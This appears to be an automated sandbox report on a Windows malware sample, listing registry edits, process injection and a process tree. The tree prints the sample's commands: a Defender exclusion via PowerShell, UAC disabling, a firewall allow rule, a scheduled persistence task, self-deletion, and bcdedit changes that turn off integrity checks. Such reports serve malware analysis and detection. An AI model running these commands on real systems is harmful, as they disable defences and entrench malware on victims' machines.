Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	axQWAftu86RVgyfsYbxmxw7K.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	axQWAftu86RVgyfsYbxmxw7K.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2328	powershell.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1980	UafCZ03bq3wLe5tapLQOnk5r.exe
2624	powershell.EXE
2624	powershell.EXE
2624	powershell.EXE
2528	UafCZ03bq3wLe5tapLQOnk5r.exe
2528	UafCZ03bq3wLe5tapLQOnk5r.exe
2528	UafCZ03bq3wLe5tapLQOnk5r.exe
2528	UafCZ03bq3wLe5tapLQOnk5r.exe
2528	UafCZ03bq3wLe5tapLQOnk5r.exe
2820	axQWAftu86RVgyfsYbxmxw7K.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
876	csrss.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe
876	csrss.exe
1504	injector.exe
876	csrss.exe
1504	injector.exe
1504	injector.exe
876	csrss.exe
1504	injector.exe
1504	injector.exe
1504	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2876	CasPol.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	1980	UafCZ03bq3wLe5tapLQOnk5r.exe
Token: SeImpersonatePrivilege	1980	UafCZ03bq3wLe5tapLQOnk5r.exe
Token: SeDebugPrivilege	2624	powershell.EXE
Token: SeSystemEnvironmentPrivilege	876	csrss.exe
Token: SeSecurityPrivilege	816	sc.exe
Token: SeSecurityPrivilege	816	sc.exe
Token: SeSecurityPrivilege	2392	sc.exe
Token: SeSecurityPrivilege	2392	sc.exe
Token: SeDebugPrivilege	2000	powershell.EXE
Token: SeDebugPrivilege	1860	powershell.EXE
Token: SeDebugPrivilege	1736	powershell.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1696	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 2328	2072	file.exe	28
PID 2072 wrote to memory of 2328	2072	file.exe	28
PID 2072 wrote to memory of 2328	2072	file.exe	28
PID 2072 wrote to memory of 2328	2072	file.exe	28
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2072 wrote to memory of 2876	2072	file.exe	30
PID 2876 wrote to memory of 2820	2876	CasPol.exe	31
PID 2876 wrote to memory of 2820	2876	CasPol.exe	31
PID 2876 wrote to memory of 2820	2876	CasPol.exe	31
PID 2876 wrote to memory of 2820	2876	CasPol.exe	31
PID 2876 wrote to memory of 2540	2876	CasPol.exe	32
PID 2876 wrote to memory of 2540	2876	CasPol.exe	32
PID 2876 wrote to memory of 2540	2876	CasPol.exe	32
PID 2876 wrote to memory of 2540	2876	CasPol.exe	32
PID 2876 wrote to memory of 1980	2876	CasPol.exe	33
PID 2876 wrote to memory of 1980	2876	CasPol.exe	33
PID 2876 wrote to memory of 1980	2876	CasPol.exe	33
PID 2876 wrote to memory of 1980	2876	CasPol.exe	33
PID 2540 wrote to memory of 1696	2540	e3ZJYTWX0UncjG7y6k8OxQNP.exe	34
PID 2540 wrote to memory of 1696	2540	e3ZJYTWX0UncjG7y6k8OxQNP.exe	34
PID 2540 wrote to memory of 1696	2540	e3ZJYTWX0UncjG7y6k8OxQNP.exe	34
PID 2540 wrote to memory of 1696	2540	e3ZJYTWX0UncjG7y6k8OxQNP.exe	34
PID 2876 wrote to memory of 2460	2876	CasPol.exe	35
PID 2876 wrote to memory of 2460	2876	CasPol.exe	35
PID 2876 wrote to memory of 2460	2876	CasPol.exe	35
PID 2876 wrote to memory of 2460	2876	CasPol.exe	35
PID 2876 wrote to memory of 2460	2876	CasPol.exe	35
PID 2876 wrote to memory of 2460	2876	CasPol.exe	35
PID 2876 wrote to memory of 2460	2876	CasPol.exe	35
PID 2460 wrote to memory of 592	2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe	36
PID 2460 wrote to memory of 592	2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe	36
PID 2460 wrote to memory of 592	2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe	36
PID 2460 wrote to memory of 592	2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe	36
PID 2460 wrote to memory of 592	2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe	36
PID 2460 wrote to memory of 592	2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe	36
PID 2460 wrote to memory of 592	2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe	36
PID 2876 wrote to memory of 1468	2876	CasPol.exe	37
PID 2876 wrote to memory of 1468	2876	CasPol.exe	37
PID 2876 wrote to memory of 1468	2876	CasPol.exe	37
PID 2876 wrote to memory of 1468	2876	CasPol.exe	37
PID 2876 wrote to memory of 1468	2876	CasPol.exe	37
PID 2876 wrote to memory of 1468	2876	CasPol.exe	37
PID 2876 wrote to memory of 1468	2876	CasPol.exe	37
PID 592 wrote to memory of 2568	592	Install.exe	38
PID 592 wrote to memory of 2568	592	Install.exe	38
PID 592 wrote to memory of 2568	592	Install.exe	38
PID 592 wrote to memory of 2568	592	Install.exe	38
PID 592 wrote to memory of 2568	592	Install.exe	38
PID 592 wrote to memory of 2568	592	Install.exe	38
PID 592 wrote to memory of 2568	592	Install.exe	38
PID 2568 wrote to memory of 904	2568	Install.exe	40
PID 2568 wrote to memory of 904	2568	Install.exe	40
PID 2568 wrote to memory of 904	2568	Install.exe	40
PID 2568 wrote to memory of 904	2568	Install.exe	40
PID 2568 wrote to memory of 904	2568	Install.exe	40
PID 2568 wrote to memory of 904	2568	Install.exe	40
PID 2568 wrote to memory of 904	2568	Install.exe	40

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2072
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Users\Admin\Pictures\axQWAftu86RVgyfsYbxmxw7K.exe
    "C:\Users\Admin\Pictures\axQWAftu86RVgyfsYbxmxw7K.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:2820
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\GDGHJEHJJD.exe"
      4⤵
      PID:2576
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\axQWAftu86RVgyfsYbxmxw7K.exe" & del "C:\ProgramData\*.dll"" & exit
      4⤵
      PID:2744
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        5⤵
        Delays execution with timeout.exe
        
        PID:1636
- - C:\Users\Admin\Pictures\e3ZJYTWX0UncjG7y6k8OxQNP.exe
    "C:\Users\Admin\Pictures\e3ZJYTWX0UncjG7y6k8OxQNP.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2540
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1696
- - C:\Users\Admin\Pictures\UafCZ03bq3wLe5tapLQOnk5r.exe
    "C:\Users\Admin\Pictures\UafCZ03bq3wLe5tapLQOnk5r.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
  - - C:\Users\Admin\Pictures\UafCZ03bq3wLe5tapLQOnk5r.exe
      "C:\Users\Admin\Pictures\UafCZ03bq3wLe5tapLQOnk5r.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:2528
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2036
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:2944
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:876
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2912
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:708
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:1116
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1348
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2844
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3032
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1688
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2904
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1188
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3028
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1976
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:756
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        7⤵
